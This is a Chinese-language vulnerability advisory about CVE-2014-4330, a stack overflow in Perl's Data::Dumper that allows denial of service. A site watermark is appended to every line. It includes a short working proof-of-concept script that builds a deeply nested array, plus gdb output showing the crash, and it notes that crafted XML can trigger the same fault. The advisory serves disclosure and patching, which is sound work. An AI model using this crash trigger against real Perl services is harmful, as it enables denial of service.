您当前的位置:首页 > perl

Perl栈溢出拒绝服务漏洞(CVE-2014-4330)

发布日期:2014-09-2557ilinux系统宝典
更新日期:2014-10-0157ilinux系统宝典

受影响系统:57ilinux系统宝典
Perl Perl 5.20.157ilinux系统宝典
描述:57ilinux系统宝典
BUGTRAQ  ID: 7014257ilinux系统宝典
 CVE(CAN) ID: CVE-2014-433057ilinux系统宝典

 Perl是一种高级、通用、直译式、动态的程序语言。57ilinux系统宝典

Perl 5.20.1及其他版本在数据转储器的实现上存在深度递归栈溢出漏洞,成功利用后可使攻击者造成拒绝服务。57ilinux系统宝典

<*来源:Markus Vervier57ilinux系统宝典
  *>57ilinux系统宝典

测试方法:57ilinux系统宝典

警 告57ilinux系统宝典

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!57ilinux系统宝典
Proof of Concept57ilinux系统宝典
 ================57ilinux系统宝典
 $ cat min.pl57ilinux系统宝典
 use strict;57ilinux系统宝典
 use Data::Dumper;57ilinux系统宝典

 my $dumpme = [];57ilinux系统宝典
 for (my $i = 0; $i < $ARGV[0]; $i++) {57ilinux系统宝典
        $dumpme = [$dumpme, "AAAAAAAA"];57ilinux系统宝典
 }57ilinux系统宝典
 print Dumper($dumpme);57ilinux系统宝典

 $ gdb --args perl min.pl 2000057ilinux系统宝典
 GNU gdb (GDB) 7.4.1-debian57ilinux系统宝典
 Copyright (C) 2012 Free Software Foundation, Inc.57ilinux系统宝典
 License GPLv3+: GNU GPL version 3 or later57ilinux系统宝典
 <http://gnu.org/licenses/gpl.html>57ilinux系统宝典
 This is free software: you are free to change and redistribute it.57ilinux系统宝典
 There is NO WARRANTY, to the extent permitted by law.  Type "show copying"57ilinux系统宝典
 and "show warranty" for details.57ilinux系统宝典
 This GDB was configured as "x86_64-linux-gnu".57ilinux系统宝典
 For bug reporting instructions, please see:57ilinux系统宝典
 <http://www.gnu.org/software/gdb/bugs/>...57ilinux系统宝典
 Reading symbols from /usr/bin/perl...Reading symbols from57ilinux系统宝典
 /usr/lib/debug/usr/bin/perl...done.57ilinux系统宝典
 done.57ilinux系统宝典
 (gdb) run57ilinux系统宝典
 Starting program: /usr/bin/perl min.pl 2000057ilinux系统宝典
 warning: no loadable sections found in added symbol-file system-supplied57ilinux系统宝典
 DSO at57ilinux系统宝典
 0x7ffff7ffa00057ilinux系统宝典
 [Thread debugging using libthread_db enabled]57ilinux系统宝典
 Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".57ilinux系统宝典

 Program received signal SIGSEGV, Segmentation fault.57ilinux系统宝典
 _IO_vfprintf_internal (s=0x7fffff7ff5c0, format=0x7ffff6bf5f89 "%ld",57ilinux系统宝典
    ap=0x7fffff7ff6f0) at vfprintf.c:132857ilinux系统宝典
 1328    vfprintf.c: No such file or directory.57ilinux系统宝典

 It was confirmed that the overflow can be triggered via the XML::Parser57ilinux系统宝典
 extension when parsing and dumping specially crafted XML-Documents.57ilinux系统宝典

建议:57ilinux系统宝典
厂商补丁:57ilinux系统宝典

Perl57ilinux系统宝典
 ----57ilinux系统宝典
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:57ilinux系统宝典

57ilinux系统宝典

Linux Socket实现机器间的通信(Perl) 57ilinux系统宝典

Perl 获取cpu使用率 57ilinux系统宝典

Perl中pop与push函数 57ilinux系统宝典

【Perl脚本】找出日志中的错误信息并发送邮件 57ilinux系统宝典

用Perl 从MySQL取出数据做统计分析代码 57ilinux系统宝典

Perl语言入门 第六版中文清晰PDF  57ilinux系统宝典

Perl 的详细介绍57ilinux系统宝典
Perl 的下载地址57ilinux系统宝典



沪ICP备10206494号-4